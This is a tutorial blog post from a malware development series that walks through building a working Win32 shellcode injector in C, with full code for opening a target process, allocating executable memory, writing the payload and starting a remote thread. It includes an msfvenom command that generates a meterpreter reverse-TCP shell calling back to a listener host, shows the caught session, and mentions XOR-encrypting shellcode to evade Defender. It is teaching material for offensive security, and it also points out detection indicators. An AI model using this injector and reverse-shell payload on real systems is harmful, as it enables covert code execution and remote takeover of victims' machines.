Shellcode Injection

June 4th, 2023

Foreword

Pork is airborne and hell hath frozen over: the second installment of our malware development series is out! In it, we learn about shellcode injection and, as a little bonus, DLL injection as well.

Malware Development II: Process Injection

Overview

This technique is as vanilla as it gets, but it's also quite elegant, don't get me wrong. The general steps for a shellcode injection are the following:

  1. Get a handle on a process by attaching to, or creating one.

  2. Allocate a buffer in the process memory with the necessary permissions.

  3. Write the contents of your shellcode to that buffer in the process memory.

  4. Create a thread that will run what you've surgically allocated and written into the process!

For this technique, we're sticking with the Win32 API, which at this point, you should be at least a little familiar with. If not, fret not. See the post below to get started:

Start here

Eventually, we'll get a bit more advanced in our craft but until then, we'll stick to using Win32 API. Just for now. Let's get started! We'll start by looking at which API calls we'll need to rip and tear into this technique... until it is done.

The API Calls

All of the documentation for these functions, as well as the entirety of the Win32 API, can be found on Microsoft's own documentation pages (commonly referred to as "MSDN"). Remember that the Win32 API is well-documented, meaning that if you have questions about what something is doing within a function or program, more often than not, you'll be able to find the answer within the docs themselves.

On the flip side, I know how daunting this incredible resource is when you first start. However, I promise that if you take the time to actually read it, you'll really come to appreciate this resource.

The most common calls you might end up seeing for this technique are something like the following (in their respective order):

/* get a handle on the process */
HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

/* allocate some space in the process memory */
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

/* write the contents of our payload into the buffer from the previous step */
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

/* create a thread to run our payload */
HANDLE CreateRemoteThreadEx(
  [in]            HANDLE                       hProcess,
  [in, optional]  LPSECURITY_ATTRIBUTES        lpThreadAttributes,
  [in]            SIZE_T                       dwStackSize,
  [in]            LPTHREAD_START_ROUTINE       lpStartAddress,
  [in, optional]  LPVOID                       lpParameter,
  [in]            DWORD                        dwCreationFlags,
  [in, optional]  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,
  [out, optional] LPDWORD                      lpThreadId
);

Creating the Program

Again, all of this probably looks really alien if you're just starting out, but worry not, I'll be holding your hand for the setup of this program. It's at this point I'd like to discuss the different kinds of compilers, IDEs, and all of that. I'm going to be programming in Visual Studio; I'll also just be using the MSVC compiler to compile my program.

Whichever IDE you use shouldn't matter in the slightest. However, the way you compile this program definitely does. We'll get more in-depth into why it's important in the "Common Pitfalls" section. For now, just follow my lead. We start by making a new project in Visual Studio, and then you can create a C or C++ file. I'll make a file called crowinject.cpp, which will house the following contents for now:

In the video, I made a C++ file, but funnily enough, I only ever make C++ files just to fill them with mostly standard C code. I'll be using more and more actual C++ in the next blogs. Also, while rewriting this blog, I've learned some new "best" practices, and I'll be making my code reflect that. As a result, the code in the video and the code in this blog will look a bit different now, but you'll live.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h> /* EXIT_SUCCESS / EXIT_FAILURE */
 
/* wake up samurai, we've got status symbols to setup 
(as we get more advanced, we'll start incorporating macros instead) */
const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]){
    printf("%s everything's in order\n", k);
    return EXIT_SUCCESS; 
}

Here, we're including the Windows header (<windows.h>) into our program, which will let us use the Win32 API, which, if we remember, is just an interface that allows us to talk to the OS. I started using EXIT_SUCCESS and EXIT_FAILURE because I really like making my code verbose. Perhaps more verbose than it should be. They're both defined in the <stdlib.h> header, and they're just a glorified way of saying 0 for success, 1 for error.

Read more here

Let's compile this, just to make sure everything's working.

After compiling the program, we can run it from the command line, or we could've just pressed Ctrl+F5 to start without debugging, which automatically compiles and runs your program. So, after doing that, we get our expected output:

Working as intended™

In the video, I defined the variables (like hProcess, hThread, PID, etc.) in the global scope. This is actually not good practice, as I've learned; it's better to have the variables defined in the function scope, otherwise it'll come back and haunt us in the future. Also, in the video, I had mentioned the Hungarian notation that Microsoft uses for its naming convention, but some of my variables weren't following the naming convention, while others were.

So, I'll try to avoid this cherry-picking and just follow the Hungarian naming convention a bit more strictly from now on. We'll make sure that the program was supplied with an argument for the PID. If it wasn't, we'll have it error out with the usage:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h> /* atoi, EXIT_SUCCESS / EXIT_FAILURE */

const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]) {

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = 0, dwTID = 0; /* DWORDs are integers, so 0 rather than NULL */
    HANDLE hProcess = NULL, hThread = NULL;

    if (argc < 2) {
        printf("%s usage: %s <PID>\n", e, argv[0]);
        return EXIT_FAILURE;
    }

    dwPID = atoi(argv[1]);

    printf("%s trying to get a handle to the process (%lu)\n", i, dwPID);

    /* try to get a handle on the process now */

    return EXIT_SUCCESS;
    
}

We see some familiar data types and variables (assuming you've gone through the first video). We've declared two HANDLE variables, hProcess and hThread, and two DWORD variables, dwPID and dwTID. We'll come back to the rBuffer in a bit, but let's continue for now. We're checking to see if the program has been supplied with an argument for the PID to attach to.

If we don't take in a PID from the CLI, we'd have to change it in the source code every single time and recompile it over and over again. And frankly, I can't think of a better example of unhinged masochism. After we get an argument for the PID, we convert it into an integer type since PIDs are numbers. Moreover, on Windows, PIDs are in practice always multiples of four (4), though that's an implementation detail rather than a guarantee. Not important here, but still pretty cool to know. At this point in our code, we're going to try to get a handle on our target process.
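One thing worth knowing about atoi is that it quietly returns 0 for input like "abc", so a typo on the command line turns into PID 0 without any warning. Below is a minimal sketch of a stricter parser built on strtoul. The helper name parse_pid is hypothetical and not part of the original program, and unsigned long stands in for DWORD so the snippet compiles without <windows.h>.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>

/* Hypothetical helper (not from the original post): parse a decimal PID.
   Returns 1 and stores the value in *out on success, 0 on any bad input. */
static int parse_pid(const char *text, unsigned long *out) {
    char *end = NULL;
    unsigned long value;

    /* reject NULL, empty strings, signs, and leading whitespace up front */
    if (text == NULL || !isdigit((unsigned char)text[0])) {
        return 0;
    }

    errno = 0;
    value = strtoul(text, &end, 10);

    /* trailing junk ("12x"), overflow, or a value too big for a 32-bit DWORD */
    if (*end != '\0' || errno == ERANGE || value > 0xFFFFFFFFUL) {
        return 0;
    }

    *out = value;
    return 1;
}
```

In main, this would take the place of the atoi call: if parse_pid(argv[1], &value) returns 0, print the usage line and bail out with EXIT_FAILURE.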

Getting a Handle

As you may know by now, we're going to be using the OpenProcess function to get a handle on our process.

OpenProcess syntax from MSDN

The easiest way to grasp what this function does is by reading the "Return value" section of this function. You can find it below:

Return value section of OpenProcess
OpenProcess return value

From this section, we can see that if OpenProcess succeeds, it will return an open handle to the specified process, which is what we're going to make our hProcess variable hold; hence why it was important to declare it as the HANDLE data type. If it fails, it will return NULL. Because of this, we can set up some pretty cool error handling for our program as we'll see soon. Let's look at the arguments this function expects:

  1. DWORD dwDesiredAccess

  2. BOOL bInheritHandle

  3. DWORD dwProcessId

The first argument is where we specify the access rights we'd like to have on the target process. There are various access rights that we could specify, which we can see below:

Process-specific access rights table from MSDN

You can read more about them here:

Process access rights table

I'll still try my best to explain what these are and why we need them, so don't worry. Basically, these process access rights determine what exactly we're allowed to do to a process. Remember the steps of this technique and how I said we'd have to allocate and write some memory within the process's memory? For us to be able to even do that, we'd at minimum need:

PROCESS_VM_OPERATION access right from the aforementioned table

As you can see, because we're trying to tinker with the address space of the process, using functions like VirtualProtectEx and WriteProcessMemory, we'd have to supply this access right. Is that it then? Is that all we supply in this argument? PROCESS_VM_OPERATION? Well... not quite. You see, these rights are extremely particular. Sure, you'll be able to allocate memory in the process (and, with PROCESS_VM_WRITE added, write to it), but how do you expect to create a thread to run your payload without an access right like:

PROCESS_CREATE_THREAD access right

Not to mention other rights like being able to query information about the process (PROCESS_QUERY_INFORMATION), suspending or resuming it (PROCESS_SUSPEND_RESUME), etc. Because of all of these little rights, it's easier for us to just specify an access right like PROCESS_ALL_ACCESS.

Note, though, that it's generally best practice to give yourself the least amount of rights needed to do something. It's safer that way, and it's the usual rule for anything involving rights and privileges. Since what we're trying to do is quite beefy and requires several different little access rights, we'll just supply PROCESS_ALL_ACCESS as our argument here to avoid that headache.

hProcess = OpenProcess(PROCESS_ALL_ACCESS, ...) 

Now, let's get on with that second parameter, bInheritHandle. This parameter is just a boolean that specifies whether processes created by our process should inherit this handle; i.e., if our process later creates a child process, should that child get a copy of the handle we're opening here? We'll set this to FALSE, since we don't really care about this right now:

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ...) 

Lastly, the dwProcessId argument is the PID of the process we'd like to open a handle to. We've already created this variable so let's just supply it here:

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); 

Et voila! We've set up this portion of the code and we can now work on some error handling, as mentioned before! Since we know that this function returns NULL on error, we can write the following:

Error handling for our process handle

Retrieving Error Codes

I've also introduced a new function here, GetLastError. One of my favourites. It's so simple but it provides so much information. Let's try an example (if you don't care, or already know what this function does, feel free to skip ahead to the next section). The GetLastError function is defined thusly:

GetLastError syntax from MSDN
Return value of GetLastError

We can see that when a call fails, this function retrieves the last error code that was set for the calling thread. Let's try to supply a PID to our program which obviously wouldn't ever exist and see what this program spits out.

Error output

We can see that the program spits out an error with the following value: 0x57. "What the hell does this mean? What do we do with this?" I may hear you ask. This value, like any of the values outputted here, is a system error code. Furthermore, from the following page:

Catalogue of various system error codes
Holy moly

We can see that there are a ton of these. What we'd do now is just cross-reference the error code we got with this neat little section, and we can quickly figure out what went wrong based on the error code! Let's take that 0x57 value from our program and see what's going on.

ERROR_INVALID_PARAMETER error code

We can see that our value of 0x57 is telling us that we've supplied an invalid parameter! That's so much information given to us! Now, you can also print this out as a decimal by changing the format specifier to %lu (0x57 is 87 in decimal). I personally like the way that hexadecimal looks a bit more, but again, all up to you. Let's try one more example, where we try to get a handle on an elevated process. Something like the System process with PID 4:

System error code of 0x5

We get an error code of 0x5. If we look this up in the error code catalogue, we can see that this tells us we don't have the necessary permissions in order to open a handle to this process:

ERROR_ACCESS_DENIED error code

Cool! You now know what these error codes are and how to help yourself debug much easier.
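To save a trip to the catalogue for the codes you hit most often, a tiny lookup table can do the cross-referencing for you. This is only a sketch: describe_error and the table are hypothetical names, not part of the original program, and the table only covers a handful of codes whose values match the system error code list (0, 5, 6, and 87). Anything else falls through to "UNKNOWN".

```c
#include <stddef.h>

/* Hypothetical lookup table (not from the original post). The numeric values
   mirror the Windows system error code list for these four entries only. */
struct error_name {
    unsigned long code;
    const char *name;
};

static const struct error_name known_errors[] = {
    { 0UL,  "ERROR_SUCCESS" },
    { 5UL,  "ERROR_ACCESS_DENIED" },
    { 6UL,  "ERROR_INVALID_HANDLE" },
    { 87UL, "ERROR_INVALID_PARAMETER" },
};

/* Returns the symbolic name for a code, or "UNKNOWN" if it isn't in the table. */
static const char *describe_error(unsigned long code) {
    size_t idx;

    for (idx = 0; idx < sizeof(known_errors) / sizeof(known_errors[0]); idx++) {
        if (known_errors[idx].code == code) {
            return known_errors[idx].name;
        }
    }
    return "UNKNOWN";
}
```

You could pass the result of GetLastError() straight into describe_error when printing a failure. For full coverage, the Win32 FormatMessage function can turn a system error code into its message text, so treat this table as a convenience rather than a replacement.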

Allocating a Buffer

Here's where we're at right now:

Received a valid handle to target process

We can see that if we supply a legitimate PID to an actual process, the program spits out the handle we got from it. Now, we need to allocate a region of memory in our target process, and we can do this with the ever-so-popular VirtualAllocEx function. Before doing that, we need to set up some variables since VirtualAllocEx will be expecting them.

(snip...)

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = 0, dwTID = 0;
    HANDLE hProcess = NULL, hThread = NULL;
    
    unsigned char crowPuke[] = "\x41\x41\x41\x41\x41\x41";
    size_t crowPukeSize = sizeof(crowPuke);

(snip...)

We're setting up our shellcode here, as well as the size of it. These bytes aren't valid shellcode and wouldn't do anything useful; if we injected and ran them, the target process would simply crash. We'll come back to creating the shellcode when the time comes, but for now, let's start setting up VirtualAllocEx.
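A small C detail hides in that sizeof: when an array is initialized from a string literal, the compiler appends a terminating '\0', so the array is one byte longer than the bytes you typed. The sketch below shows the difference between the two initializer styles. The names are hypothetical and only there for illustration.

```c
#include <stddef.h>

/* string-literal initializer: six 0x41 bytes plus the implicit '\0' */
static const unsigned char from_literal[] = "\x41\x41\x41\x41\x41\x41";

/* brace initializer: exactly the six bytes listed, no terminator */
static const unsigned char from_braces[] = { 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };

/* sizeof counts the whole array, terminator included */
static size_t literal_size(void) { return sizeof(from_literal); }
static size_t braces_size(void)  { return sizeof(from_braces); }
```

So crowPukeSize here would be 7 rather than 6. The extra byte is harmless for our purposes, but it's worth knowing when the byte counts in your output look off by one.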

VirtualAllocEx syntax from MSDN

The first parameter is a handle to our process. Our hProcess variable is currently holding the return value from OpenProcess, which again, is just an open handle to our target process. So, we can just put in hProcess for this argument.

rBuffer = VirtualAllocEx(hProcess, ...)

The second parameter, lpAddress, is an optional argument for this function. It's just a pointer that specifies the starting address for the region of pages that we'd like to allocate. If we set this to NULL, the function will determine where to allocate the region. Therefore, we'll let the function drive itself home for this part.

rBuffer = VirtualAllocEx(hProcess, NULL, ...)

The next argument, dwSize, is where we specify the size of the region of memory that we'd wish to allocate. This is the size of our shellcode from earlier. So, let's populate this argument as such:

rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, ...)
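Memory is handed out in whole pages, so when lpAddress is NULL the requested size gets rounded up to the next page boundary. The arithmetic can be sketched as below, assuming a 4096-byte page, which is typical on x86/x64 (the real value is reported by GetSystemInfo). round_up_to_page is a hypothetical helper for illustration, not a Win32 function.

```c
#include <stddef.h>

/* Hypothetical helper (not a Win32 API): round size up to a multiple of
   page_size. page_size must be non-zero. */
static size_t round_up_to_page(size_t size, size_t page_size) {
    return (size + page_size - 1) / page_size * page_size;
}
```

With a 4096-byte page, asking for 7 bytes still occupies one full 4096-byte page, and asking for 4097 bytes occupies two.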

Next up, we have the flAllocationType. This is the type of allocation we'd like to do.

Allocation types

For our case here, we just want to reserve some space (MEM_RESERVE) and then actually commit that memory (MEM_COMMIT). So, let's add them both.

rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), ...)

Last but not least, we have to select the memory protection that we want our allocated memory to have. From the documentation:

flProtect section of VirtualAllocEx from MSDN

So, we're allowed to specify any one of the memory protection constants, huh? Let's go give them a visit and see what we're allowed to supply here 😄. You can find these memory protection constants below:

Memory Protection Constants
Some of the memory protection constants for us to use

As is the case with most of Microsoft's stuff, there are a lot of things for us to choose from here. However, we need to remember the basics. We're going to be giving ourselves PAGE_EXECUTE_READWRITE (RWX) for our shellcode. If we don't have the execute permissions, it's like the whole nightmare of dealing with NX/DEP. Our shellcode won't be of any use to us if we can't execute it.

Remember that a buffer allocated in a process's memory with full RWX permissions can look extremely suspicious. Some techniques use a function like VirtualProtect instead (or VirtualProtectEx, when the memory lives in another process). What happens there is something like the following: you allocate a region of memory with minimal permissions initially (something like RW), and then change those permissions (to something like RX) through the flNewProtect argument supplied to this function.

[in] flNewProtect

The memory protection option. This parameter can be one of the memory protection constants.

For mapped views, this value must be compatible with the access protection specified when the view was mapped (see MapViewOfFile, MapViewOfFileEx, and MapViewOfFileExNuma).

rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); /* horrible permissions, ik - better off making this rw -> virtualprotect() -> rx */

With that done, we've allocated our buffer at this point! This means we're now ready to actually write the contents of our shellcode, into our recently allocated buffer inside of the process memory.

Writing to Process Memory

Here's where we're at right now:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h> /* atoi, EXIT_SUCCESS / EXIT_FAILURE */

const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]) {

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = 0, dwTID = 0;
    HANDLE hProcess = NULL, hThread = NULL;
    
    unsigned char crowPuke[] = "\x41\x41\x41\x41\x41\x41";
    size_t crowPukeSize = sizeof(crowPuke);
            
    if (argc < 2) {
        printf("%s usage: %s <PID>\n", e, argv[0]);
        return EXIT_FAILURE;
    }

    dwPID = atoi(argv[1]);

    printf("%s trying to get a handle to the process (%lu)\n", i, dwPID);

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); 

    if (hProcess == NULL) {
        printf("%s failed to get a handle to the process, error: 0x%lx\n", e, GetLastError());
        return EXIT_FAILURE;
    }

    printf("%s got a handle to the process\n\\---0x%p\n", k, hProcess);

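    rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

    /* VirtualAllocEx returns NULL on failure, so check before going any further */
    if (rBuffer == NULL) {
        printf("%s failed to allocate the buffer, error: 0x%lx\n", e, GetLastError());
        CloseHandle(hProcess);
        return EXIT_FAILURE;
    }

    printf("%s allocated %zu-bytes to the process memory w/ PAGE_EXECUTE_READWRITE permissions\n", k, crowPukeSize);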

    /* write shellcode contents to the allocated buffer */

    return EXIT_SUCCESS;

}

Let's try running this just to make sure we're getting the expected output.

Lookin' good, shawty

Nice. Now we can finally write the contents of our shellcode into this recently created buffer. In order to do that, we utilize the WriteProcessMemory function.

WriteProcessMemory syntax from MSDN

The first parameter is the handle to our process, hProcess.

WriteProcessMemory(hProcess, ...)

This second parameter (lpBaseAddress) is the rBuffer that we've created and allocated to the process memory. As we can see from the documentation:

lpBaseAddress parameter

WriteProcessMemory(hProcess, rBuffer, ...)

The lpBuffer is the next parameter. This is where we specify the actual contents of our shellcode. Earlier, you heard me say that the shellcode we have currently would shred our process memory and cause it to crash. Well... why hasn't that happened yet? It's because allocating memory with VirtualAllocEx doesn't run anything, and neither does writing to it. The crash only happens once a thread actually tries to execute those bytes. This is why we're able to allocate this memory without the target crashing.

For those who are new, a tip to help you think about VirtualAllocEx and WriteProcessMemory would be like the following:

Think of the buffer that you create with VirtualAllocEx as a canvas. You defined how big it is, what permissions it has, the memory allocation type, etc. Then, you can think of WriteProcessMemory as the step in which you actually write whatever (or paint whatever in this analogy) to that allocated buffer.

WriteProcessMemory(hProcess, rBuffer, crowPuke, ...)

The nSize argument is the size of our shellcode, which we've already defined as crowPukeSize (so sorry for these naming conventions):

WriteProcessMemory(hProcess, rBuffer, crowPuke, crowPukeSize, ...)

And lastly, we have an output parameter called lpNumberOfBytesWritten. This just stores the number of bytes we've written in the memory region. You can choose to add this if you want, but we'll just set it to NULL, which causes the parameter to be ignored.

WriteProcessMemory(hProcess, rBuffer, crowPuke, crowPukeSize, NULL);

And just like that, we've set up the WriteProcessMemory function. Let's add in a quick little print statement indicating such.

Almost there!

And now, if we try to run this, we can see the following output:

Current program output

All that's left for us is to create a thread to run our payload!

Creating a Thread

In this section, we're going to be creating a thread with the CreateRemoteThreadEx function. If we take a look at the return value of this function, we can see that it behaves much like OpenProcess: a handle on success, NULL on failure. The only difference is that in this case, we're dealing with threads.

Return value of CreateRemoteThreadEx

Because we know that this function returns a handle to the new thread, we'll make our hThread variable hold this return value:

hThread = CreateRemoteThreadEx()

Let's look at the syntax for this function.

CreateRemoteThreadEx syntax from MSDN

Now, I know. There are like 12 duovigintillion parameters for this function. However, fret not - most of them are going to be zero (0) or NULL. We know the drill by now, we'll fill out what we know, and then consult the documentation for what we don't know.

hThread = CreateRemoteThreadEx(hProcess, ...)

The lpThreadAttributes, as we can see from the documentation, is just a pointer to the SECURITY_ATTRIBUTES structure. It specifies a security descriptor for the new thread and also determines whether child processes can inherit the returned handle. If we set this to NULL, the thread will get a default SD (security descriptor) and the handle cannot be inherited.

Documentation for the lpThreadAttributes parameter

hThread = CreateRemoteThreadEx(hProcess, NULL, ...)

For the dwStackSize argument, we can set it to 0 to let the thread use a default stack size for the executable.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, ...)

This next section is going to take a bit to explain, but it's pretty cool, nonetheless. So, I'll write out the code here, and then we can explain what's going on here.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, ...)

Okay, just relax. I know your heart rate just quadrupled, and you can practically ski on the clumps of hair you've pulled out of your scalp from seeing this random line of code seemingly come from nowhere, but just relax. We'll figure this out. So, firstly, let's discuss the parameter itself, before delving into what we're supplying as an argument. Let's consult the documentation.

lpStartAddress parameter documentation

This parameter is where we specify a pointer to the starting address of what we'd wish to run. We want execution to begin at the buffer that we've created, which at this point, would've had the contents of our shellcode written into it, and we typecast this buffer to the LPTHREAD_START_ROUTINE to match the signature of this parameter. For the next parameter (lpParameter), we can just set it to NULL since we don't have any variables that we're passing to the thread function (lpStartAddress).

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, ...)

The next section is the creation flags we'd wish to specify for our thread. dwCreationFlags could be any of these values:

dwCreationFlags values

We see that if we supply 0 here, the thread will run immediately after creation. The CREATE_SUSPENDED flag could also be a cool thing to mess around with, but that's left as an exercise for the reader. We'll supply 0 here since we want our thread to run immediately.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, ...)

We only have 2 arguments left to supply, we're almost there! The second-to-last parameter of this function, lpAttributeList, contains additional parameters for the new thread. We don't really care about this for now, so we can just set this to zero (0), which for a pointer parameter is the same as passing NULL:

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, ...)

And lastly, the final parameter (lpThreadId) is a pointer to the variable that will receive the thread ID (TID) of the newly created thread. So, let's pass the address of the dwTID variable we declared alongside dwPID.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &dwTID);

So, at this point, we could run our program, and we'll see that it injects into our target process, but because we're using gibberish as shellcode, the target process crashes:

Invalid shellcode demo

So, what we'll do here - is firstly, add in some more debugging lines for verbosity. Secondly, we'll generate some valid shellcode from msfvenom and try to perform the injection, for real.

(snip ...)

    /* create a thread to run our payload */
    hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &dwTID);
    
    if (hThread == NULL) {
        printf("%s failed to get a handle to the new thread, error: %lu\n", e, GetLastError());
        return EXIT_FAILURE;
    }
    
    /* print the thread handle here, not the process handle */
    printf("%s got a handle to the newly-created thread (%lu)\n\\---0x%p\n", k, dwTID, hThread);

    printf("%s waiting for thread to finish executing\n", i);
    WaitForSingleObject(hThread, INFINITE);
    printf("%s thread finished executing, cleaning up\n", k);

    CloseHandle(hThread);
    CloseHandle(hProcess);
    printf("%s finished, see you next time :>", k);

    return EXIT_SUCCESS;

}

The WaitForSingleObject and CloseHandle functions are also going to be left as an exercise for you to learn about. It will be really fun for you to seek out what these functions do. They're pretty straightforward from their names, but regardless, for these two functions, you're on your own 😉

Generating Shellcode

I'll be using my Kali machine to generate the shellcode, but it literally doesn't matter what OS you use; we're only interested in one tool for now, msfvenom. You could write your own shellcode if you want. PIC shellcode has been pretty huge recently, but we're going to take the easy route for now and just generate ours with a tool.

I did say I was going to generate calc.exe shellcode for our injections, but since this is our first time, let's live a little, eh? I'll run the following command:

cr0w@blackbird: ~
ζ ›› msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=443 -f c --var-name=crowPuke
Shellcode generation with msfvenom

For the 100th time, remember to make the architecture of your shellcode match the architecture of your injection program. So, let's fix up our injection program with this as our payload, and after that, we'll set up the multi/handler listener needed to catch the callback for this reverse shell.

Setting up multi/handler

Now, we're all set to execute our program.

Performing the Injection

We recompile the program, and after specifying a valid PID to our injector, we can see the results:

Mission accomplished!

Furthermore, if we close the meterpreter session:

meterpreter > getuid
Server username: BAT-COMPUTER\Bruce
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.198.130 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/handler) >

We can see that the WaitForSingleObject function we were using, successfully notes that our thread has finished executing!

Beautiful

Because we've got a reverse shell from our notepad.exe process, we'll see in the Modules tab within this amazing tool, Process Hacker 2:

Process Hacker 2 Download

There's an entry of some "networking"-related stuff in this process, which under normal circumstances would never be there. This would be an insanely suspicious IOC (Indicator of Compromise): why would Notepad ever need sockets or anything to do with networking? If we look at the "Threads" tab within Process Hacker, we can see our newly created thread in the list:

Thread ID found in Process Hacker

If we double-click on that thread in Process Hacker, we can see some peculiar stuff on the thread stack:

Thread stack showing presence of ws2_32.dll

Or, better yet, in the "Modules" section of the program, we can see this ws2_32.dll and mswsock.dll loaded into the modules:

ws2_32.dll module loaded into process

Now, what would a socket library be doing in our humble Notepad process? You can see this mentioned in one of the holiest resources for malware development:

Addressing the ws2_32.dll and shellcode injection

And there you go! You've come such a long way and you've learned so much! Seriously, you should be proud of yourself for making it this far. We'll now discuss some common pitfalls that can prevent you from reproducing this attack. You can find the source code of this program attached below, or on the GitHub repository that'll house all the code that we end up making in these blogs/videos.

Shellcode Injection source code

Common Pitfalls

A crazed lunatic once messaged me; the message showed her following along with this guide and performing her own shellcode injection. "Yippie!", I thought to myself. But alas, the message continued, and with it, my plight:

User obfuscated to spare you guys the sanity drain

"Strange..." I pondered the state of her process's memory, which looked like it had been injected with the generated payload:

Executing the injection, no process spawns

A million different scenarios went through my head. "Could it be Defender?", "Could it be the payload?", "Could it be something to do with the build/version of Windows?", "Could it be the program itself?", etc. It turns out that she was using the same build of Windows as me, so that's out of the question.

Her winver output

And even so, we're using a higher-level API, so the build and version shouldn't even matter. The source code wasn't the issue either, since at one point she'd tried some code that I knew would work (super simple XOR encryption to bypass Defender). I gave her some code that had XOR-encrypted shellcode, since I wanted to test whether it was an issue with Defender as well. Turns out, nope. Windows Defender wasn't even triggered during the compilation of the program, so that's out the window.

Moreover, even with the XOR-encrypted shellcode, after the injection was run, there still wasn't a new process to show for it. So, eventually, we took a break. Then, at the time of writing this blog post, April 30th, 2023, I got yet another message about someone facing a similar issue. Their program, just for the life of them, would not spawn a new process; even though it seemingly did inject it into the target process's memory.

Another similar issue arose

The user had told us that they were compiling with gcc like this:

gcc shellcodeinjection.cpp -o shellcodeinjection.exe

And because of this, I thought that maybe they were using wide API functions, i.e., SomeFunctionW(), but failing to include the -municode flag for compilation. So, after consulting some amazing, amazing friends of mine, the real culprit, architecture, was brought to light.

Resolution speed-run. Also, hello k4ngar00 :)

It was at this very moment that my eyes opened up wider than they ever have. I could see individual fermions whizzing past my eyes, I could grab clouds, I could smell numbers, taste vision, etc. How could we forget this? It was so painfully obvious: you must compile your program for the architecture that you wish to target, and your shellcode must follow the same harmony. Remember that x86 shellcode != x86_64 shellcode. You also can't have your 32-bit program injecting into a 64-bit process. Anyways, we sent our newly-crested warrior out to compile their program as a 64-bit program and we patiently awaited their response.
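A cheap way to catch this mistake early is to have the program report its own bitness at startup. Here's a minimal sketch based on pointer width; build_bits and matches_target are hypothetical helper names, not part of the original program.

```c
#include <stddef.h>

/* Hypothetical helper (not from the original post): pointer width of THIS
   build. 8-byte pointers mean a 64-bit build, 4-byte pointers a 32-bit one. */
static int build_bits(void) {
    return (int)(sizeof(void *) * 8);
}

/* Returns 1 when this build's bitness matches what we believe the target is. */
static int matches_target(int target_bits) {
    return build_bits() == target_bits;
}
```

Printing build_bits() as the first line of main makes a 32-bit build obvious at a glance. On the target side, the Win32 IsWow64Process function can tell you whether a process is running as 32-bit on 64-bit Windows, which is one way to work out the value you'd pass to matches_target.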

Mission accomplished.

Perfection. We had finally conquered the bug that plagued us for so long, with nary a trail for us to even follow it. Congratulations, l0n31yMC. May the offensive security gods bless you on the rest of your trek.

TL;DR

Acknowledgements

Thank you to the amazingly beautiful wizards, @bakki and aqua for helping debug this stupidly simple oversight. I love you guys. And remember guys, sometimes, the solution is far simpler than you think it is. See you in the next section. Also, thank you to everyone who's given me constructive criticism of the site as a whole, the code, the videos, etc.

Again, at the time of rewriting this blog, June 4th, 2023, it's only been about 3 months since I started my malware development journey. Therefore, there's obviously still an incredible amount of stuff that I don't know. I appreciate all of you for being patient with my ignorance and teaching me new things to become better and better.
